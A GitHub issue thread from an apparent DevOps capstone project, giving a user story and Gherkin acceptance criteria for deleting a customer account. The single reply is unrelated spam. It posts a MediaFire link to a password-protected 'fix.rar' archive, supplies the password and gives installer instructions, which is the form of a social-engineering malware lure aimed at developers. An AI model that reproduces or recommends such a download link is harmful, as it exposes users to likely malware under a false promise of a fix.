### ISSUE TITLE
Delete an account from the service

### ISSUE THREAD

**Issue by thiombanemor** [thiombanemor/devops-capstone-project#4]
**As a** System Administrator
**I need** to delete a customer account
**So that** I can remove outdated or incorrect information from the system

      
### Details and Assumptions
    * Deleted accounts should be permanently removed from the database.    

### Acceptance Criteria     
    gherkin 
    Given a customer account exists in the service
    When I issue a delete request for the account
    Then the account should be permanently removed from the service
    And any subsequent requests for that account should return a not found error

**Comment by Viotemis** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
